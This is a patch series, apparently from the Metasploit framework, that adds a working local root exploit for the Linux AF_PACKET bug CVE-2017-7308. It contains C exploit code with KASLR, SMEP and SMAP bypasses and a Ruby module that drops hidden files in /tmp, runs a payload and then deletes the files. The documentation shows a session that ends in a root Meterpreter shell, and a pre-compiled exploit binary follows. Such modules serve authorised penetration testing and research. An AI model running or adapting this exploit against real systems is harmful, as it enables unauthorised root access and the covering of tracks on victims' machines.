+	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
+		dprintf("[-] write_file(/proc/self/uid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
+		dprintf("[-] write_file(/proc/self/gid_map)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	cpu_set_t my_set;
+	CPU_ZERO(&my_set);
+	CPU_SET(0, &my_set);
+	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
+		dprintf("[-] sched_setaffinity()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (system("/sbin/ifconfig lo up") != 0) {
+		dprintf("[-] system(/sbin/ifconfig lo up)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int main(int argc, char *argv[]) {
+	if (argc > 1) SHELL = argv[1];
+
+	dprintf("[.] starting\n");
+
+	check_procs();
+
+	dprintf("[.] checking kernel version\n");
+	detect_versions();
+	dprintf("[~] done, version looks good\n");
+
+	dprintf("[.] checking SMEP and SMAP\n");
+	check_smep_smap();
+	dprintf("[~] done, looks good\n");
+
+	dprintf("[.] setting up namespace sandbox\n");
+	setup_sandbox();
+	dprintf("[~] done, namespace sandbox set up\n");
+
+#if ENABLE_KASLR_BYPASS
+	dprintf("[.] KASLR bypass enabled, getting kernel addr\n");
+	KERNEL_BASE = get_kernel_addr();
+	dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+	dprintf("[.] commit_creds:        %lx\n", COMMIT_CREDS);
+	dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	dprintf("[.] native_write_cr4:    %lx\n", NATIVE_WRITE_CR4);
+#endif
+
+	dprintf("[.] padding heap\n");
+	kmalloc_pad(KMALLOC_PAD);
+	pagealloc_pad(PAGEALLOC_PAD);
+	dprintf("[.] done, heap is padded\n");
+
+#if ENABLE_SMEP_SMAP_BYPASS
+	dprintf("[.] SMEP & SMAP bypass enabled, turning them off\n");
+	oob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
+	dprintf("[.] done, SMEP & SMAP should be off now\n");
+#endif
+
+	dprintf("[.] executing get root payload %p\n", &get_root_payload);
+	oob_id_match_execute((void *)&get_root_payload);
+	dprintf("[.] done, should be root now\n");
+
+	check_root();
+
+	while (1) sleep(1000);
+
+	return 0;
+}
diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
new file mode 100644
index 0000000000..8a9f177208
--- /dev/null
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AF_PACKET packet_set_ring Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a heap-out-of-bounds write in the packet_set_ring
+        function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel
+        to execute code as root (CVE-2017-7308).
+
+        The bug was initially introduced in 2011 and patched in version 4.10.6,
+        potentially affecting a large number of kernels; however this exploit
+        targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
+        including Linux distros based on Ubuntu Xenial, such as Linux Mint.
+
+        The target system must have unprivileged user namespaces enabled and
+        two or more CPU cores.
+
+        Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
+        may crash the kernel.
+
+        This module has been tested successfully on Linux Mint 18 (x86_64)
+        with kernel versions:
+
+        4.8.0-34-generic;
+        4.8.0-36-generic;
+        4.8.0-39-generic;
+        4.8.0-41-generic;
+        4.8.0-42-generic;
+        4.8.0-44-generic;
+        4.8.0-45-generic.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrey Konovalov', # Discovery and C exploit
+          'Brendan Coles'     # Metasploit
+        ],
+      'DisclosureDate' => 'Mar 29 2017',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        => [[ 'Auto', {} ]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          [ 'EDB', '41994' ],
+          [ 'CVE', '2017-7308' ],
+          [ 'BID', '97234' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],
+          [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],
+          [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],
+          [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],
+          [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]
+        ],
+      'DefaultTarget'  => 0))
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+    output = cmd_exec "gcc -o #{path} #{path}.c"
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    cmd_exec "chmod +x #{path}"
+    register_file_for_cleanup path
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
+    fd = ::File.open path, 'rb'
+    data = fd.read fd.stat.size
+    fd.close
+    data
+  end
+
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    version = kernel_release
+    unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/
+      vprint_error "Linux kernel version #{version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Linux kernel version #{version} is vulnerable"
+
+    arch = kernel_hardware
+    unless arch.include? 'x86_64'
+      vprint_error "System architecture #{arch} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    cores = get_cpu_info[:cores].to_i
+    min_required_cores = 2
+    unless cores >= min_required_cores
+      vprint_error "System has less than #{min_required_cores} CPU cores"
+      return CheckCode::Safe
+    end
+    vprint_good "System has #{cores} CPU cores"
+
+    unless userns_enabled?
+      vprint_error 'Unprivileged user namespaces are not permitted'
+      return CheckCode::Safe
+    end
+    vprint_good 'Unprivileged user namespaces are permitted'
+
+    if kptr_restrict? && dmesg_restrict?
+      vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload exploit executable
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile executable_path, exploit_data('poc.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx executable_path, exploit_data('exploit')
+    end
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Launch exploit
+    print_status 'Launching exploit...'
+    output = cmd_exec "#{executable_path} #{payload_path}"
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end

From 0b9a18274658f06a9971efeac7c8b9cdb634b098 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 28 Apr 2018 01:51:28 +0000
Subject: [PATCH 2/6] Add documentation

---
 .../af_packet_packet_set_ring_priv_esc.md     | 92 +++++++++++++++++++
 1 file changed, 92 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md

diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md
new file mode 100644
index 0000000000..1314da491b
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md
@@ -0,0 +1,92 @@
+## Description
+
+  This module exploits a heap-out-of-bounds write in the `packet_set_ring`
+  function in `net/packet/af_packet.c` (`AF_PACKET`) in the Linux kernel
+  to execute code as `root` (CVE-2017-7308).
+
+  The bug was initially introduced in 2011 and patched in version 4.10.6,
+  potentially affecting a large number of kernels; however this exploit
+  targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
+  including Linux distros based on Ubuntu Xenial, such as Linux Mint.
+
+  The target system must have unprivileged user namespaces enabled and
+  two or more CPU cores.
+
+  Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
+  may crash the kernel.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on Linux Mint 18 (x86_64)
+  with kernel versions:
+
+  * 4.8.0-34-generic
+  * 4.8.0-36-generic
+  * 4.8.0-39-generic
+  * 4.8.0-41-generic
+  * 4.8.0-42-generic
+  * 4.8.0-44-generic
+  * 4.8.0-45-generic
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use af_packet_packet_set_ring_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+  **COMPILE**
+
+  Options: `Auto` `True` `False` (default: `Auto`)
+
+  Whether the exploit should be live compiled with `gcc` on the target system,
+  or uploaded as a pre-compiled binary.
+
+  `Auto` will first determine if `gcc` is installed to compile live on the system,
+  and fall back to uploading a pre-compiled binary.
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/linux/local/af_packet_packet_set_ring_priv_esc 
+  msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Writing '/tmp/.ZxgWSP2O1.c' (19378 bytes) ...
+  [*] Writing '/tmp/.jfPl4uPX2' (207 bytes) ...
+  [*] Launching exploit...
+  [*] Sending stage (857352 bytes) to 172.16.191.207
+  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.207:41882) at 2018-04-27 19:55:21 -0400
+  [+] Deleted /tmp/.ZxgWSP2O1.c
+  [+] Deleted /tmp/.ZxgWSP2O1
+  [+] Deleted /tmp/.jfPl4uPX2
+  
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : 172.16.191.207
+  OS           : LinuxMint 18 (Linux 4.8.0-45-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
+

From c5f980f63303408b03cce44028c388c349e319c8 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Wed, 16 May 2018 02:38:19 +0000
Subject: [PATCH 3/6] GoodRanking

---
 .../exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
index 8a9f177208..7ae5227d77 100644
--- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = GreatRanking
+  Rank = GoodRanking
 
   include Msf::Post::File
   include Msf::Post::Linux::Priv

From ce5b24eda07f8c4cb4991b0a96952115cbf6130c Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Wed, 16 May 2018 20:34:32 +0800
Subject: [PATCH 4/6] fork early and cleanup files in module

---
 data/exploits/cve-2017-7308/poc.c                     | 11 +++++++++++
 .../linux/local/af_packet_packet_set_ring_priv_esc.rb |  9 ++++++---
 2 files changed, 17 insertions(+), 3 deletions(-)

diff --git a/data/exploits/cve-2017-7308/poc.c b/data/exploits/cve-2017-7308/poc.c
index 713e7cb98c..69df692343 100644
--- a/data/exploits/cve-2017-7308/poc.c
+++ b/data/exploits/cve-2017-7308/poc.c
@@ -741,6 +741,17 @@ int main(int argc, char *argv[]) {
 	check_smep_smap();
 	dprintf("[~] done, looks good\n");
 
+	pid_t pid = fork();
+	if (pid == -1) {
+		dprintf("[-] fork()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (pid != 0) {
+		dprintf("[.] performing exploit...\n");
+		return 0;
+	}
+
 	dprintf("[.] setting up namespace sandbox\n");
 	setup_sandbox();
 	dprintf("[~] done, namespace sandbox set up\n");
diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
index 7ae5227d77..06b114a018 100644
--- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -79,9 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    rm_f path
     write_file path, data
-    register_file_for_cleanup path
   end
 
   def upload_and_chmodx(path, data)
@@ -99,7 +97,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     cmd_exec "chmod +x #{path}"
-    register_file_for_cleanup path
   end
 
   def exploit_data(file)
@@ -179,6 +176,7 @@ class MetasploitModule < Msf::Exploit::Local
     if live_compile?
       vprint_status 'Live compiling exploit on system...'
       upload_and_compile executable_path, exploit_data('poc.c')
+      rm_f "#{executable_path}.c"
     else
       vprint_status 'Dropping pre-compiled exploit on system...'
       upload_and_chmodx executable_path, exploit_data('exploit')
@@ -192,5 +190,10 @@ class MetasploitModule < Msf::Exploit::Local
     print_status 'Launching exploit...'
     output = cmd_exec "#{executable_path} #{payload_path}"
     output.each_line { |line| vprint_status line.chomp }
+    print_status 'Deleting executable...'
+    rm_f executable_path
+    Rex.sleep 5
+    print_status 'Deleting payload...'
+    rm_f payload_path
   end
 end

From 4322e56c71b79090dda6c2cd4b272383c07d8262 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Thu, 17 May 2018 09:43:07 +0000
Subject: [PATCH 5/6] Recompile pre-compiled exploit executable (stripped, no
 DEBUG)

---
 data/exploits/cve-2017-7308/exploit | Bin 72880 -> 55416 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/data/exploits/cve-2017-7308/exploit b/data/exploits/cve-2017-7308/exploit
index 02813270d85a92dc11784943c1a95449c8f468b3..d23d5d9a501c1eef32127a0acc1cfa597449621b 100644
GIT binary patch
delta 10111
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
